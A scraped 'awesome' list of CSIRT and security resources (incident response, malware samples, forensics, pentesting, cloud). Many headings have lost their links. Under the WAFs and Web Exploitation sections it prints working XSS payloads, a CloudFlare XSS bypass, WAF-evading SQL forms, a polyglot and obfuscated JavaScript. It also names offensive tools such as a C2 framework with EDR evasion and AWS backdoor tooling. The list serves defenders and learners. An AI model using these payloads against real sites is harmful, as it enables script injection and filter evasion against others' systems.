Awesome CSIRT is a curated list of links and resources in security and CSIRT daily activities.

Spacial/awesome-csirt

CSIRT Awesome

*Please contribute through pull requests ;)

Another great list: awesome-incident-response

Books

Links

Incident Response

Hashing

CVEs

  • Some CVEs stuff and links here and in here
  • MikroTik search on shodan.
  • TROMMEL: Sift Through Directories of Files to Identify Indicators That May Contain Vulnerabilities
  • cve_manager: A python script that a) parses NIST NVD CVEs, b) processes and exports them to CSV files, c) creates a postgres database and imports all the data in it, d) provides query capabilities for this CVE database.
  • dorkbot: Command-line tool to scan Google search results for vulnerabilities.
  • NotQuite0DayFriday: This is a repo which documents real bugs in real software to illustrate trends, learn how to prevent or find them more quickly.
  • Exploit Prediction Scoring System (EPSS): The Exploit Prediction Scoring System (EPSS) is an open, data-driven effort for predicting when software vulnerabilities will be exploited. Our goal is to assist network defenders to better prioritize vulnerability remediation efforts.
  • CVE PoC: Almost every publicly available CVE PoC.

Malware Analysis

Web Malwares

Malware Samples

Repos

  • A repository of LIVE malwares for your own joy and pleasure: theZoo
  • malware.one is a binary substring searchable malware catalog containing terabytes of malicious code.
  • Beginner Malware Reversing Challenges, by MalwareTech. repo
  • MalwareWorld: Check for Suspicious Domains and IPs. Repo: MalwareWorld: System based on +500 blacklists and 5 external intelligences to detect potentially malicious internet hosts
  • C2Matrix: The goal of this site is to point you to the best C2 framework for your needs based on your adversary emulation plan and the target environment
  • LOLBITS: C2 framework that uses Background Intelligent Transfer Service (BITS) as communication protocol and Direct Syscalls + Dinvoke for EDR user-mode hooking evasion.
  • MalwareBazaar: is a project from abuse.ch with the goal of sharing malware samples with the infosec community, AV vendors and threat intelligence providers.
  • What is MWDB Core? mwdb-core: Malware repository component for samples & static configuration with REST API interface.
  • Malpedia: The primary goal of Malpedia is to provide a resource for rapid identification and actionable context when investigating malware. Openness to curated contributions shall ensure an accountable level of quality in order to foster meaningful and reproducible research.

Ransomwares

Virus/Anti-Virus

Trojans/Loggers

Malware Articles and Sources

Reverse Engineering

Decompilers

Yara

Ghidra

Frameworks

Patching

  • Did Microsoft Just Manually Patch Their Equation Editor Executable? Why Yes, Yes They Did. (CVE-2017-11882)

Hardening

WebServers

Credentials

Tokens

Secure Programming

Web Training

SAST

Secure Web dev

Formal Analysis

Fuzzing

API

REST

CTFs

CTFs tools

  • CTFs-Exploits
  • nc-chat-ctf: Chat Server for CTF Players wrapped in SSL.
  • thg-framework
  • Super-Guesser-ctf
  • Ciphr: CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
  • sec-tools: A set of security related tools.
  • Real World CTF 2023: Solving a Java CTF challenge by writing static analysis passes!

Phreak

Archs

Hardware

ARM

Pentesting

Reconnaissance

Enumeration

WebShells

ShellCodes

Reporting

OSINT - Open Source INTelligence

OSINT Webscraping

OSINT Chats

Vulnerability

WAFs

    '';!--"<XSS>=&{()}
    <IMG SRC="javascript:alert('XSS');">
    <IMG SRC="jav&#x09;ascript:alert('XSS');">
    <IMG SRC="jav&#x0A;ascript:alert('XSS');">
    <IMG SRC="jav&#x0D;ascript:alert('XSS');">
    <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  • CloudFlare XSS Bypass:

    <svg
    onload=alert%26%230000000040
    "1")>
    SELECT-1e1FROM`test`
    SELECT~1.FROM`test`
    SELECT\NFROM`test`
    SELECT@^1.FROM`test`
    SELECT-id-1.FROM`test`
    jaVasCript:/*-/*`/*\`/*'/*"/**/( oNcliCk=alert() )//%0D%0a%0d%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Exploits

Payloads

Bug Bounty

  curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

Web Exploitation

    𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
    𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
    +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
    +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()

Burp Suite

Red Team

Command & Control (C2)

Purple Team

DNS

Exfiltration

Steganography

Phishing

Forensics

  • Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
  • O-Saft: OWASP SSL advanced forensic tool
  • PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
  • swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics
  • The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
  • Invoke-LiveResponse
  • Linux Forensics
  • CDQR: The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
  • mac_apt: macOS Artifact Parsing Tool
  • MacForensics: Repository of scripts for processing various artifacts from macOS (formerly OSX).
  • imago-forensics: Imago is a Python tool that extracts digital evidence from images.
  • remedi-infrastructure: setup and deployment code for setting up a REMEDI machine translation cluster
  • Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
  • libelfmaster: Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
  • usbrip (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.
  • Digital Forensics and Incident Response: This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response.
  • KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. blog post. KAPE docs and KAPE Files
  • AVML(Acquire Volatile Memory for Linux).
  • turbinia: Automation and Scaling of Digital Forensics Tools
  • Eric Zimmerman's Tools
  • MacQuisition: A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
  • Kuiper: Digital Forensics Investigation Platform
  • file Signatures:
  • PowerForensics: PowerForensics provides an all in one platform for live disk forensic analysis. Powershell
  • OfficeForensicTools: A set of tools for collecting forensic information.
  • FBI Electronic Tip For
  • CHIRP: A forensic collection tool written in Python.
  • Hash Cracking with AWS and hashcat
  • Hashcat new feature: autodetect hash-mode
  • L0phtCrack is a password auditing and recovery application originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, hybrid attacks, and rainbow tables. gitlab repo
  • Foremost: is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you
  • TrID: is a utility designed to identify file types from their binary signatures. While there are similar utilities with hard coded logic, TrID has no fixed rules. Instead, it's extensible and can be trained to recognize new formats in a fast and automatic way.
  • image-unshredding: Image unshredding using a TSP solver.
  • Linux Incident Response Guide
  • FastIR Artifacts: Live forensic artifacts collector.
  • MVT (Mobile Verification Toolkit) helps conduct forensics of mobile devices in order to find signs of a potential compromise.
  • Cloud Forensics Triage Framework (CFTF)
  • Forensic Investigation Cisco Stealthwatch at work
  • Andriller CE (Community Edition): is a software utility with a collection of forensic tools for smartphones. It performs read-only, forensically sound, non-destructive acquisition from Android devices.
  • Dshell is a network forensic analysis framework.
  • exif-gps-tracer: A python script which allows you to parse GeoLocation data from your image files stored in a dataset. It also produces output as a CSV file and as an HTML Google Maps page.
  • Anti-Forensics:
    • ShredOS x86_64 - Disk Eraser: for all Intel 64 bit processors as well as processors from AMD and other vendors which make compatible 64 bit chips. ShredOS - Secure disk erasure/wipe.
  • dfir_ntfs: An NTFS/FAT parser for digital forensics & incident response.
  • MemProcFS: is an easy and convenient way of viewing physical memory as files in a virtual file system.
  • LeechCore: Physical Memory Acquisition Library & The LeechAgent Remote Memory Acquisition Agent.
  • PCILeech: Direct Memory Access (DMA) Attack Software.

PDF

Email Headers

Distros

Volatility

Blue Team

Threat Hunting

MISP

APT - Advanced Persistent Threat

IoCs

SIEM

Browsers

Browsers Addons

Operating Systems

UEFI

Windows

Active Directory

Mimikatz

Powershell

Office and O/365

macOS/iOS

Mobile

Android

Linux/ *Nix

Cloud

GCP/Google

Azure

AWS

  • git-secrets: Prevents you from committing secrets and credentials into git repositories.
  • CloudMapper: CloudMapper helps you analyze your Amazon Web Services (AWS) environments.
  • Security Monkey: Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.
  • my-arsenal-of-aws-security-tools: List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
  • RKMS: RKMS is a highly available key management service, built on top of AWS's KMS.
  • FireProx: AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation.
  • AWS IAM privileges as found using the AWS Policy Generator described at
  • Sadcloud: A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure.
  • Endgame: Creating Backdoors in AWS.
  • Bucky: An automatic S3 bucket discovery tool.
  • Prowler: Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness.
  • barq: The AWS Cloud Post Exploitation framework!
  • Text → AWS IAM Policy: Describe your ideal AWS IAM Policy in plain text and it will use GPT-3 from OpenAI to generate an AWS IAM policy.

Risk Assessment and Vulnerability Management

Guidelines

ICS (SCADA)

Radio

Satellite

Social Engineering

Tools

Note-taking

Kali

IP Reputation

Shell tools

  • Python-Scripts: some scripts for penetration testing.
  • SubEnum: bash script for Subdomain Enumeration
  • password-store: Simple password manager using gpg and ordinary unix directories.

Search Engines

VPN

  • jigsaw project by Alphabet/Google. Outline: VPN Server.
  • SSHuttle: Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling.
  • WireGuard: is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache.
  • Crockford’s base 32 encoding: Crockford’s base 32 encoding is a compromise between efficiency and human legibility.
  • Sputnik -An Open Source Intelligence Browser Extension
  • PCredz: This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.
  • uncaptcha2: defeating the latest version of ReCaptcha with 91% accuracy
  • Nefarious LinkedIn: A look at how LinkedIn spies on its users.
  • ProtonVPN-CLI: Linux command-line client for ProtonVPN. Written in Python.
  • Nebula: A scalable overlay networking tool with a focus on performance, simplicity and security. Introducing Nebula
  • AirVPN: A VPN based on OpenVPN and operated by activists and hacktivists in defence of net neutrality, privacy and against censorship.
  • Build your own private WireGuard VPN with PiVPN.

Secure Sharing

  • CryFS: Keep your data safe in the cloud. code
  • Cryptomator: Multi-platform transparent client-side encryption of your files in the cloud. code
  • VeraCrypt: is a free open source disk encryption software for Windows, Mac OSX and Linux.
  • CipherShed: is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs). code
  • Boxcryptor: Security for your Cloud.
  • Nextcloud E2E: End-to-end encryption RFC. Some old news about it
  • DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition. code
  • ProjectSend is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more!
  • Mozilla send: Simple, private file sharing from the makers of Firefox (archived). Revival: send

Privacy

General

Configs
Resources

  • 13 Best New Software Security Books To Read In 2021
  • pwn.college is a first-stage education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. It is designed to take a “white belt” in cybersecurity to becoming a “blue belt”, able to approach (simple) CTFs and wargames. The philosophy of pwn.college is “practice makes perfect”.
  • 'pwnable.kr' is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. the main purpose of pwnable.kr is 'fun'.
  • Pwnable.tw is a wargame site for hackers to test and expand their binary exploiting skills.
  • Security Zines: graphical way of learning concepts of Application & Web Security.

Training and Certifications

Conferences and Slides

Sans

psyops
Sources

Some good places to visit:
Fun
Articles
Other Repos